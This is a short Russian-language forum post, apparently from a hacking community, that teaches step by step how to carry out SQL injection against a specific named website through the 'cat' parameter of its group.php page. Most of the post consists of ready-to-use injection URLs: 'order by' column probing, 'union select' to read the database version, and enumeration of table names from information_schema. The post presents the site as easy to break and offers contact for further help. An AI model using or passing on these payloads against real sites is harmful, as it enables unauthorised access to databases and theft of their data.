все очень просто , во первых лучшеб былоб если ты в эжтой переменной провел бы скуль, http://mir-tech.ru/group.php?cat= так как она самая такая доступная... ) я покажу именно на ней ) впринципе там во всех переменных возможна скуль)))) ну да алдно
первым делом делаешь следующее
http://mir-tech.ru/group.php?cat=-1+order+by+10/* он выдаст ошибку значит столбцов меньше 10 ))
http://mir-tech.ru/group.php?cat=-1+order+by+5/* снова ошибка значит меньше 5 и так далее мы дойдем до того что столбцов меньше 2 )) отсюда следует что столбов 1 )) 1 столбец ))
http://mir-tech.ru/group.php?cat=-1+union+select+1/*
вот выдал тебе единичку )) далее чстобы узнать версию

http://mir-tech.ru/group.php?cat=-1+union+select+version()/*

5.0.41-log )) вот она легко ломается ))
если что непонятно первым делом сюда ) http://forum.antichat.ru/thread43966.html
)) а так можешь потсучаться в асю 896353 )


http://mir-tech.ru/group.php?cat=-5+union+select+table_name+from+information_schema. tables+limit+3,1/*
таким образом перебираешь таблицы ))
вместо 3 можешь вставить к примеру 1 тад будет превая таблица ) 2 будет вторая )) +) и т.д )